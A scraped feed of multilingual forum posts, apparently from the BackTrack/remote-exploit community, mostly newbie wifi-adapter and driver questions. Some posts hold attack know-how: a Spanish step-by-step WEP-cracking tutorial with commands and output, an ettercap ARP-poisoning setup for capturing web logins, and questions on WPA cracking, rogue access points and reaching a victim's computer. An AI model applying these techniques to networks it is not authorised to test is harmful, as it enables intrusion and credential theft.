Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
He intentado con varios comandos pero sigue igual, en al red tampoco he encontrado nada, así que aquí estoy.
Necesito ayuda para conectar, espero que luego me de la ip.
Saludos.
Roberto.
-
1:06
»
remote-exploit & backtrack
Hey guys, I just want to say thank you for all the valuable information on here. I have learned a lot by just reading. I wanted to wait until I had a really good question to make my first post. I really hope this hasn't been answered already. If it has, I'm sorry. Must have missed it. I've been googling for hours trying to find a specific answer but I can't find it. Here goes...is it possible (using CUDA) to use John-the-ripper to generate passwords, have Pyrit compute the hash's and pipe directly to cowpatty to crack? If it is possible, what would be the command for that? I consider myself somewhat of a noob, so please don't assume I know something ;) Thank you!
-
-
11:26
»
remote-exploit & backtrack
^^Title^^
That would be so awesome.
-- Dr. Nick
-
9:13
»
remote-exploit & backtrack
It drives me mad! Yeah!!! My friend's modem had pass 1234567890 and was hacked with 20.000 IVS. My pass is different, and I have already captured 100.000 IVS and it is still not hacked.Is this possible?
-
9:11
»
remote-exploit & backtrack
provato a recuperare la key in modo senza cliente ( dati non sono reali ma precisi nei vari comandi)
airodump-ng -c 11 -b 00:1A:C1:15:BE:34 -w cap mon0
CH 11 ][ Elapsed: 3 mins ][ 2010-02-26 13:34
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH E
00:1A:C1:15:BE:34 -74 100 1986 0 0 11 54 . WEP WEP OPN 3
BSSID STATION PWR Rate Lost Packets Probes
fin qua tutto ok nessun clinte attacco chopchop
aireplay-ng -1 0 -a 00:1A:C1:15:BE:34 -h 00:E0:4C:05:1A:32 mon0 comando per associare
13:31:11 Waiting for beacon frame (BSSID: 00:1A:C1:15:BE:34) on channel 11
13:31:11 Sending Authentication Request (Open System) [ACK]
13:31:11 Authentication successful
13:31:11 Sending Association Request [ACK]
13:31:11 Association successful :-) (AID: 1)
fin qua tutto ok almeno secondo il mio parere.
aireplay-ng -4 -b 00:1A:C1:15:BE:34 -h 00:E0:4C:05:1A:32 mon0
13:31:29 Waiting for beacon frame (BSSID: 00:1A:C1:15:BE:34) on channel 11
^Cad 1502 packets...
Qui penso che ci sia un problema non avrebbe dovuto crearmi un finestra differente e poi confermare con Y invece e partita senza domandarmi niente e girare cosi all'infinito ?
avrebbe dovuto risponder cosi :
Read 165 packets...
Size: 86, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:14:6C:7E:40:80
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:40:F4:77:E5:C9
0x0000: 0842 0000 ffff ffff ffff 0014 6c7e 4080 .B..........l~@.
0x0010: 0040 f477 e5c9 603a d600 0000 5fed a222 .@.w..`:...._.."
0x0020: e2ee aa48 8312 f59d c8c0 af5f 3dd8 a543 ...H......._=..C
0x0030: d1ca 0c9b 6aeb fad6 f394 2591 5bf4 2873 ....j.....%.[.(s
0x0040: 16d4 43fb aebb 3ea1 7101 729e 65ca 6905 ..C...>.q.r.e.i.
0x0050: cfeb 4a72 be46 ..Jr.F
Use this packet ? y
-
-
19:51
»
remote-exploit & backtrack
Im going crazy here correct me if im wrong but doesnt this cap have all four parts I need?
well seems i can not link to my cap file sorry ! GRRRRRR
So why does aircrack say i dont have the key?
-
-
7:44
»
remote-exploit & backtrack
Good morning!
So here is probably the craziest scenario-
my ALFA AWUS050NH is in monitor mode, but when I run:
# airodump-ng ra0
it only sees ONE wifi network. The same wifi network on EVERY channel, and there's 5 around me, which is so odd..
any ideas?
Thanks in advance =)
-
-
4:25
»
remote-exploit & backtrack
Salve a tutti,
vorrei testare una wpa di alice a 24 caratteri sfruttando john the ripper nel " incremental mode" andando a creare nel file john.conf un mode incremental con i caratteri a me necessari.Ho gia visto nel forum di aircrack che e' necessario configuare un file di collelagamento con estensione .char esempio :
[Incremental:Alpha]
File = $JOHN/alpha.chr
MinLen = 1
MaxLen = 8
CharCount = 26
qui con questa configurazione john crea caratteri presi dal file alpha.char con lung. max di 8 e min di 1
Il mio problema e' che modificando il parametro maxlen con un valore maggiore di 8 john va in errore e non riesco neanche ad aprire il file alpha.chr.Sempre sul forum di aircrack dice anche di dover modificare il file john.pot ma non dice come.Sicuro del vostro aiuto vi ringrazio anticipatamente.
-
1:09
»
remote-exploit & backtrack
Ciao a tutti! Ho letto molti articoli interessanti sullo sniffing, ma la mia scheda wifi intel3945 vede solo il traffico del mio pc. Ho seguito un sacco di guide su internet su abilitazioni di monitor mode o compat-wireless ma le cose non cambiano. Posso risolvere il prblema o devo rassegnarmi? Utilizzo ubuntu 9.10.
Grazie! :)
-
0:36
»
remote-exploit & backtrack
Hi everyone,
I'm a big fan of these forums and have learned a lifetime of information simply by reading and lurking. I'm an up-and-coming programmer and I wanted to give something back to the community...
Grim Wepa [v0.5] is currently in beta mode, and I'm looking for testers!
The program is available on Google Code at:
code.google.com/p/grimwepa/
Grim Wepa is heavily influenced by SpoonWEP and SpoonWPA; both in GUI and functionality. I am a fan of ShamanVirtuel's work and wanted to see if I could create something similar.
The Spoon suite (SpoonWEP/2, SpoonWPA) wasn't working properly for me on BT4, so I wrote this program in Java to automate WEP and WPA cracking.
GrimWepa does NOT include a fancy new cracking method: It is the same tried-and-true methods that we are all accustomed to (aircrack-ng, airodump-ng, aireplay-ng, and the like). GrimWepa merely automates the running of these scripts in an easy-to-use GUI format.
I've only been able to test each option briefly, and some attacks have been completely unsuccessful (Chop-chop and Cafe-latte refuse to generate packets on my router). Fragmentation, ARP replay, and -p0841 work very well, as does the WPA handshake capture + wordlist attack.
I have posted the source code (not to v0.6, but a recent revision) to allow others to aid in developing if they wish. If you want to compile the program yourself, you can access the source using the console command:
svn checkout http[colon]//grimwepa.googlecode.com/svn/trunk/
Note: use a real colon : instead of [colon] to properly checkout the code. (I'm not allowed to post full URLs yet!)
Some files that are in the .jar file are not included in the source (such as default_pw.txt and README.txt), so be aware. You will also need the app "javac" to compile the source code (javac is available in the sun-java6-jdk install package).
For those that don't want to compile themselves, just download the .jar file and type:
java -jar grimwepa_0.5.jar
at the console to get started.
Enjoy!
-Derv
-
-
7:04
»
remote-exploit & backtrack
hi all
i tried to crack a friends WEP encrypted AP with airocrack-ng (command line , if any GUI exist plz let me know)
i use this command :
sudo airmon-ng start wlan0 5
sudo airodump-ng --ivs -w Erix -c 5 wlan0
sudo aireplay-ng -5 -b 00:00:00:00:00:00 -h 00:00:00:00:00:00 wlan0
sudo aireplay-ng -1 0 -e Torkanet -a 00:00:00:00:00:00 -h00:00:00:00:00:00 wlan0
(MAC addresses is diffrent but Ap is Torkanet :D & it is on channel 5)
this is when no clients present!
and this commands when we use a clients :
sudo airmon-ng start wlan0 5
sudo airodump-ng --ivs -w Erix -c 5 wlan0
sudo aireplay-ng -0 10 -a 00:00:00:00:00:00 -c 00:00:00:00:00:00 wlan0
sudo aireplay-ng -3 -b 00:00:00:00:00:00 -h 00:00:00:00:00:00 wlan0
the problem is when aircrack-ng gots packegs it said ".....still nothing tring another package" it done this over and over and over till i ran low on physical memory :D!! what should i do?
is our network secured enough?
and other silly question is :D on this command :
sudo aireplay-ng -5 -b 00:00:00:00:00:00 -h 00:00:00:00:00:00 wlan0
which MAC address is mine and which is for Ap? (the same question goes for -3 option!!)
by the way sry for my weak english!!:D
-
-
18:18
»
remote-exploit & backtrack
hi
i want to join the BackTrack WiFu cours
Ask not what I will do I get aim of this course
Please help from experts in this discipline
Do you advise me to register for this course
What do you think of this course
-
-
12:32
»
Hack a Day
[Tom Shannon] uses science as part of his art. One of his methods when painting is to use this radio controlled paint pendulum. He gave an interview at his studio, which we’ve embedded after the break, and goes into detail about this device. It has six different reservoirs that hold the paint colors. Each gravity-fed [...]
-
-
20:26
»
remote-exploit & backtrack
Buenas Noches a todos,
El Porque de Este Tutorial (unicamente para principiantes, los demas paciencia jeje)
Estaba hoy en la oficina pensando en que debia contribuir a la comunidad que tanto me ha ayudado a mi, asi que decidi hacer este mini tutorial para las personas a las que le interese todo lo que es seguridad de redes inalambricas en general.
En esta oportunidad voy a cubrir unicamente rasgos muy generales de la suite que viene por defecto con Backtrack 4 (aircrack-ng) unicamente ya que cuando hablamos de seguridad de wireless pues es un tema bastante extenso y ustedes deberan leer y buscar informacion de lo que mas le interese. :D
Datos Legales
Este documento es escrtito unicamente con el proposito de orientar a las personas a que realizen las mejores practicas de seguridad posible, del mismo modo que esta destinado a propositos meramente educacionales y por ningun motivo una persona deberia entrar a una red o sistema computacional sin el debido permiso.
Que es este tool del que voy a hablar:
Airmon-ng: Es una herramienta que permite poner nuestras tarjetas inalambricas en modo monitor para de esta manera poder hacer "tareas" que de otra forma no serian posibles.
Aireplay-ng: es una herramienta que nos permite inyectar paquetes a un access point (AP) en este caso un router, para que la capturacion de datos no tome siglos.
Airodump-ng: es una herramienta que nos permite hacer un "dump" de los paquetes que son enviados a travez del AP, capturaarlos y analizarlos.
Aircrack-ng: la palabra lo dice todo, es la herramienta que se usa para crackear si ese tesmino aplica, las claves de dichas redes dependiendo de cual sea la situacion.
Ahora que ya tenemos idea de que es lo que vamos a usar vamos a setear todo.
Que necesitamos:
Una laptop con BT4 (live cd o instalado)
Un AP (router)
Y bien, supongamos que nuestra red se llama conejo, tiene "encriptacion wep" y queremos entrar. ahora que hacemos???
Tenemos que hacer varias cosas como lo son:
- Ver que tarjeta tenemos
- "bajarla" para poder hacer cambios en la forma en que trabaja.
- cambiar nuestra mac address por seguridad
- activar modo monitor en la tarjeta
Aqui esta una ides de como se debe hacer, al menos a mi me funciona de esta forma :)
root@infected:~# airmon-ng
Interface Chipset Driver
wlan0 Atheros ath5k - [phy0]
mon0 Atheros ath5k - [phy0]
root@infected:~# airmon-ng stop wlan0
Interface Chipset Driver
wlan0 Atheros ath5k - [phy0]
(monitor mode disabled)
mon0 Atheros ath5k - [phy0]
root@infected:~# ifconfig wlan0 down
root@infected:~# macchanger --mac 00:11:22:33:44:55 wlan0
Current MAC: 00:11:22:33:44:55 (Cimsys Inc)
ERROR: Can't change MAC: interface up or not permission: Device or resource busy
root@infected:~# ifconfig wlan0 down
root@infected:~# macchanger --mac 00:11:22:33:44:55 wlan0
Current MAC: 00:11:22:33:44:55 (Cimsys Inc)
Faked MAC: 00:11:22:33:44:55 (Cimsys Inc)
It's the same MAC!!
root@infected:~# airmon-ng start wlan0
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
10859 wpa_supplicant
10888 dhclient
Process with PID 10859 (wpa_supplicant) is running on interface wlan0
Process with PID 10888 (dhclient) is running on interface wlan0
Interface Chipset Driver
wlan0 Atheros ath5k - [phy0]
(monitor mode enabled on mon1)
mon0 Atheros ath5k - [phy0]
root@infected:~#
Ahora tenemos que "monitorear" los paquetes que van destinados al AP con lo siguiente
root@infected:~# airodump-ng mon0
CH 9 ][ Elapsed: 8 s ][ 2010-02-04 20:35
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:03:2F:28:FD:74 -27 4 2 0 1 54 . WEP WEP conejo
BSSID STATION PWR Rate Lost Packets Probes
(not associated) 00:24:2B:B4:6D:6D -75 0 - 1 12 9
00:03:2F:28:FD:74 00:11:22:33:44:55 0 0 - 1 0 7 conejo
Y ahora "agarrar" esos paquetes con lo siguiente:
root@infected:~# airodump-ng -c 1 -w conejo --bssid 00:03:2F:28:FD:74 mon0
CH 1 ][ Elapsed: 16 s ][ 2010-02-04 20:37
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:03:2F:28:FD:74 -26 0 16 4 0 1 54 . WEP WEP conejo
BSSID STATION PWR Rate Lost Packets Probes
00:03:2F:28:FD:74 00:11:22:33:44:55 0 54 - 1 0
Ahora, si no sentamos a esperar quela "DATA" llegue a unos 15000 paquetes (minimo requerido para encontrar la clave web" entonces podremos tardar horas en eso, es por eso que aqui viene nuestro querido aireplay-ng a la jugada....
Asi que lo que tenemos que hacer es lo siguiente: inyectar paquetes al AP para que los IV's (initialization vectors) que es donde se encuentra la clave se generen mas rapido, haciendo lo siguiente:
root@infected:~# aireplay-ng -1 0 -a 00:03:2F:28:FD:74 -h 00:11:22:33:44:55 -e conejo mon0
The interface MAC ( 00:11:F5:78:C0:D0 ) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether 00:11:22:33:44:55
20:45:02 Waiting for beacon frame (BSSID: 00:03:2F:28:FD:74) on channel 1
20:45:02 Sending Authentication Request (Open System) [ACK]
20:45:02 Authentication successful
20:45:02 Sending Association Request [ACK]
20:45:02 Association successful :-) (AID: 1)
root@infected:~# aireplay-ng -3 -b 00:03:2F:28:FD:74 -h 00:11:22:33:44:55 mon0
The interface MAC (00:11:F5:78:C0:D0) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether 00:11:22:33:44:55
20:47:00 Waiting for beacon frame (BSSID: 00:03:2F:28:FD:74) on channel 1
Aqui tenemos que esperar hasta que la data llegue hasta minimo 15000 paquetes para poder crackearlo...
CH 1 ][ Elapsed: 4 mins ][ 2010-02-04 21:01
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:03:2F:28:FD:74 -24 46 247 78575 276 1 54 . WEP WEP conejo
BSSID STATION PWR Rate Lost Packets Probes
00:03:2F:28:FD:74 00:11:22:33:44:55 0 48 - 1 114686 194709 conejo
^C
root@infected:~#
Despues de esto, que tensmos suficientes IVS or DATA entonces vamos a lo ultimo ya que es crackear la password.
root@infected:~# aircrack-ng -n 128 -b00:03:2F:28:FD:74 conejo-01.cap
Aircrack-ng 1.0 r1645
[00:02:32] Tested 1376257 keys (got ********* IVs)
KB depth byte(vote)
0 0/ 1 FB(256512) FA(208640) 0A(202240) 16(201984) B5(201984)
1 0/ 1 00(400384) F8(311552) F7(272640) F6(208896) 07(202240)
2 0/ 1 FC(597760) F3(335616) F4(310528) F2(272384) 03(202240)
3 0/ 1 FB(793856) ED(335360) EE(334336) F3(256256) EF(232448)
4 0/ 1 FA(932608) E7(333568) ED(320000) E8(318976) E9(224000)
5 0/ 1 F9(1007104) E6(381952) E0(333056) E1(317696) E7(255488)
6 0/ 1 F8(1019648) DE(395776) D8(380160) DF(317184) D9(316416)
7 0/ 1 F7(1016064) D5(394496) D6(379392) CF(378112) D7(318720)
8 0/ 1 F6(1012736) CB(393472) CC(392960) CD(380672) C5(376576)
9 0/ 22 BD(260608) 82(260096) 86(260096) 88(259840) 8A(259840)
10 0/ 1 F6(997632) FA(392448) FB(391936) 5A(391168) F9(389888)
11 0/ 1 0F(994304) 15(393728) 13(391936) 25(391424) 14(390912)
12 0/ 1 24(884724) 9E(366844) 9C(365888) 9D(365300) 9B(363208)
Starting PTW attacks with 78575 ivs.
KEY FOUND! backtracking
Decrypted Correctly: 100%
root@infected:~#
Y esto seria todo por parte de WEP...
Se aceptan correcciones...Saludos y espero este material haya servido... El siguiente sera el de WPA.....y que conste, es mi primera vez... :)
-
2:26
»
remote-exploit & backtrack
Hi guys
i have been playing around with Rogue APs for a little while with Airbase and mitmap..
What i was thinking is if it would be possible to add a captive portal to the fake ap, so anyone who connects to it is redirected to a specific webpage.
I have tried messing with other captive portall/firewall programs like zeroshell and pfsense, but both of these run from a live cd and need a whole other computer to run.
i have heard you can achieve the captive portal by using iptables also..
if this is possible can some one explain how to do this in backtrack 4., and if there is any other possible ways as im pretty stuck..
thanks a lot...
Cee:)
-
-
10:26
»
remote-exploit & backtrack
I wonder if this wireless usb card can be set into monitor mode?
the model is: d'link dwa 125, it uses a ralink chipset.
-
-
15:43
»
remote-exploit & backtrack
Salve a tutti,stò disperatamente cercando i driver per far funzionare la mia netgear Wg111 V2 con chipset rtl8187l su backtrack 4 final,nella versione precedente,backtrack 3 beta,me la riconosceva alla grande,senza aggiuna di driver,ora no,non penso che anzichè andare avanti andiamo indietro,quindi sicuro sbaglio io,comunque di sicuro penso che sia supportata,almeno sperooo...Che mi dite...Praticamente me la riconosce tra le periferiche usb,ma in gestione network non la trova,come anche dando ifconfig mi trova solo una periferca "lo" che tra l'altro non sò cosa sia....Ki mi dà una mano?anche dicendomi qualcosa che mi faccia fermare da questa astenuante ricerca...
grazie mille!!!
saluti luca
-
14:07
»
remote-exploit & backtrack
How can i find and replace all the {word}/{random_chars} with {word}.I've tried using sed but i find it too complicated.Could you help me with a right tutorial or a sed command that will do something like that?
Here is an example of what my wordlist looks like:
Code:
abandonare
abandonarii
abandona/RT
abandonata
abandonat
abandonati
abandonat/W
abandoneaza
abandoneze
abandonez/W
abandonind
abandonuri/L
abanos
abata
abate
abateau
abatere/Z
abateri/GL
abatia/Z
abatoare/XC
abator
abatut/XM
abatut
abces
abdica/AP
abdicare
abdicare
abdicari/LZ
abdica/RZ
abdice/LZ
abdominale
abecedarul
abera/XC
aberanta
aberant
aberante/L
aberant/IW
aberatia/PZ
aberatii/GL
abereze/AZ
......
I also have to mention that this is a romanian wordlist , and is the only one i could find.
-
10:06
»
remote-exploit & backtrack
Hello,
well,i'm new onto bt place,a great package imho to learn.
i'm not here to post problems,wrong place posts etc..
i'm a kind of newbie into wifi reverse,my location didn't allowed to test it in real mode.
my question is simple,after reading many tutorials and vids,something is not answered for me.
If i hack a wep,wpa (with easy pass),may i able to gain access to the weak host..files?(i mean the guy or girl sharing his AP with weak pw).
how to get access to his computer once wifi hacked?
well,i dont except a vidz tut to do it ;) but what to do if so.
thanks!!
-
-
12:28
»
remote-exploit & backtrack
:confused:como se pone en la consola- o esto-- a mi en la consola al teclearlo me sale/
-
7:27
»
remote-exploit & backtrack
Bonjour à tous,
J'ai un soucis qui me tient tête depuis un sérieux moment.
Mon ordinateur portable est sous Windows Vista, j'ai installé en second boot un Linux Backtrack 3 (et bientôt le 4) et malheureusement, sur ce Linux, ma carte réseau Wifi n'est pas installé, d'où pas moyen de pouvoir accéder à Internet. J'aimerais savoir comment dois-je faire pour installer le Driver de cette carte et faire fonctionner le tout pour que je puisse enfin pouvoir faire ce que je dois faire pour mon travail d'étude en terminal.
Bien à vous,
bil0ute
-
7:21
»
remote-exploit & backtrack
Hola a todos.Tengo una duda,por q no se genera el handshake con el comando aireplay-ng ...,habiendo mas de un cliente conectado en una red WPA.
Gracias y saludos
-
-
10:59
»
remote-exploit & backtrack
Saluti a tutti.
Ho installato bt4 su un pc con 3 interfaccie wireless. Ho configurato con wicd la connessione con la mia rete utilizzando una delle tre interfaccie per comandare il pc da remoto (vnc-ssh).
Avendo la necessità di connettere un'altra interfaccia ad un altra rete, mi sono accorto che non posso utilizzare wicd-client che mi disconnette dalla rete predefinita.
Ho provato con iwconfig senza successo. Volevo usare wpa_supplicant ma non trovo il file di configurazione nel solito percorso /etc/wpa_supplicant/wpa_s..conf.
Grazie se qualcuno può aiutarmi.
-
7:01
»
remote-exploit & backtrack
Vorrei acquistare una nuova antenna, completamente compatibile con backtrack, che supporti il monitor mode e packet injection, tempo fa avevo trovato una Zydas ZD1211RW da 18db, ke purtroppo mi son fatto scappare :-(( ora ho pensato di puntare su una ALFA AWUS036H 1000mw (Realtek 8187L) con antenna da 7 o 5db...potrebbe andar bene?? meglio la versione da 500mw x avere anche la nuova banda N ?
Grazie x i consigli
-
-
6:37
»
remote-exploit & backtrack
ciao a tutti... mi sto esercitando ora con ettercap ma ho problemi con lo sniffing di dati gmail, facebook, hotmail. allora la procedura che faccio io è
mi connetto alla rete wifi es. 1234.. sono connesso
2 vado in /etc/ettercap.conf e modifico le 2 stringe cosi :
- redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
- redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
- redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
- redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
senza i cosi #
salvo e chiudo.
apro poi internet/ettercap mi connetto alla mia interfaccia wlan1
scan for host e mi fa la ricerca degli host connessi
hostlist
poi seleziono il gateway predefinito e clicco ad target1
poi su mitc - arp poisong spunto le due voci do la conferma
poi start sniffing
questo e tutto..
ma quando vado a fare il login es di facebook dall'altro computer mi rileva che mi sono connesso al sito facebook.com ma non mi fa la cattura login..
come mai?? in cosa sbaglio?? risp helppp :confused ::(
-
4:36
»
remote-exploit & backtrack
ciao a tutti ho appena installato bt4 nell'hard disk mi da solo un problema quando accendo il pc si avvia in automatico xp come faccio a configurarlo in modo che all'avvio mi da la possibilità di scegliere tra i due hard :confused:disk? edit in teoria mi avrebbe dovuto creare una partizione di 9 gb con appunto bt4 come mai xp non la riconosce mentre se faccio partire il live cd di bt4 me la riconosce.. mahh
-
-
16:42
»
remote-exploit & backtrack
I set up a wireless network with WPA/TKIP encriptation to try to crack it.
I got the hash in a .cap file. I'd like to know if I can get the hash out of the cap file. I know I can run aircrack or cowpatty on the cap file with a wordlist or rainbow table but I'm curious about how to find the hash. I also would like to know if I can try to crack it like it was a MD5 hash.
Thanks for the attention.
-
10:51
»
remote-exploit & backtrack
Olas a todos
bueno les cuento soy nuevo en este foro y he tenido un problema sobre ste programa :/
tengo el backtracks 3, una tarjeta atheros AR5005G y un tutorial para funcionar el software.....
hago todos los pasos y hasta ahi todo bien pero cuando quiero injectar me sale esto:
Sending Authentication Request
Sending Authentication Request
Sending Authentication Request
como 5 o 6 veces mas y me sale cmo 6 opciones pk no se ha podido injectar
alguna ayuda por favor??
gracias
-
8:22
»
remote-exploit & backtrack
ciao ragazzi mi è appena arrivata l'alfa.. sto facendo dei test con netstumbler per vedere il segnale delle varie reti alchè da quanto sembra dalla potenza segnale che hanno come se fosserò tutte reti di casa mia.. ma connettendo ad una rete la connessione va lenta.. inferiore alla velocità con cui andavo con l'altra chiavetta di alice che avevo..:(:( questo è la rete a cui mi connetto..
-
7:01
»
remote-exploit & backtrack
is it a 14 dbi directional antenna , better than an omnidirectional antenna with less dbi , but at the same price?
-
-
17:18
»
remote-exploit & backtrack
For the past two weeks I have been messing with cracking wpa, wpa2 networks. I have scoured the forums here as well as googled enough that it now only suggests wpa related topics lol.
But from what I've concluded, it seems that wpa2 is quiet possibly as secure as we need as long as you have a secure password.
My rationale is that because a person can literally make anything their password that most wordlists would not be able to crack it. If someone makes there password with just their last name and say, their birthday. (i.e. Martin04221966) most password lists would not be able to crack that.
So, I guess my overall question is for someone to correct me if I'm wrong on saying that if a password includes a proper noun or multiple words plus numbers, the wpa attack would not be able to crack the password.
